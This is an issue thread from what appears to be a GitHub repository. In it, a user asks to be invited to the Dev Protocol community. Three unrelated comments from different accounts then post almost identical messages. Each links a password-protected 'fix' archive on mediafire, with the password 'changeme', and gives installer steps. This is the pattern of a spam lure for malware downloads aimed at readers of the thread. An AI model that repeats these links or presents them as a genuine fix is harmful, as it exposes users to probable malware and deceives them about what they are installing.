### ISSUE TITLE
Please invite me to the community

### ISSUE THREAD

**Issue by SamMintah** [dev-protocol/community#877]
### Name

Samuel Mintah

### Discord Username (if applicable)

.kay_tech

### Additional Context

I came across the Dev Protocol Community while researching blockchain solutions for creators. I love how it empowers creators to tokenize their work and grow their economy through a decentralized platform. I'm excited to join because I want to contribute to this innovative ecosystem, collaborate with others, and help drive the future of creator sustainability.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
